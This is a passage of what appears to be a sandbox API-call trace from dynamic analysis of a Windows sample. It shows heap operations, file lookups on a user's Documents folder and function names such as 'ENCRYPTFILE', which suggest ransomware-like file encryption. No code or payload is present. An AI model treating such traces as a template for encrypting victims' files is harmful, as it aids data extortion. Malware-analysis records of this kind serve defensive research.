(in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0075.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0075.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0075.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0075.901] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0075.901] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0075.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0075.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0075.901] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0075.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0075.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0075.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0075.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2240 [0075.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0075.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0075.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0075.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0075.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0075.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0075.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0075.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0075.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0075.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0075.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0075.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9920 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0075.902] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0075.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0075.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0075.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0075.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0075.903] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0075.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0075.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0075.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0075.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0075.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0075.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0075.903] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\CzDg7AgA6_wtvH.ods", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e188980, ftCreationTime.dwHighDateTime=0x1d5e2d5, ftLastAccessTime.dwLowDateTime=0x869ba5c0, ftLastAccessTime.dwHighDateTime=0x1d5e984, ftLastWriteTime.dwLowDateTime=0x869ba5c0, ftLastWriteTime.dwHighDateTime=0x1d5e984, nFileSizeHigh=0x0, nFileSizeLow=0x1149, dwReserved0=0x10100c0, dwReserved1=0x8, cFileName="CzDg7AgA6_wtvH.ods", cAlternateFileName="CZDG7A~1.ODS")) returned 0x41ac540 [0075.903] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0075.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0075.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0075.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0075.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0075.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0075.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0075.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0075.903] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0075.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0075.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0075.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0075.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0075.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0075.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e30 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0075.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0075.904] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0075.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0075.904] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0075.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0075.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21a0 [0075.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0075.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0075.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0075.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0075.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0075.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0075.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0075.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0075.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0075.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0075.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0075.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0075.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0075.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d28 [0075.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0075.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0075.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0075.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0075.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0075.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0075.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0075.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0075.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0075.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0075.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0075.907] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0075.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0075.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0075.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0075.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0075.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0075.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0075.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0075.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0075.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0075.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0075.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0075.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0075.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0075.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0075.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0075.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0075.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0075.911] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0075.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0075.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0075.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0075.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0075.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0075.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0075.911] RtlAllocateHeap 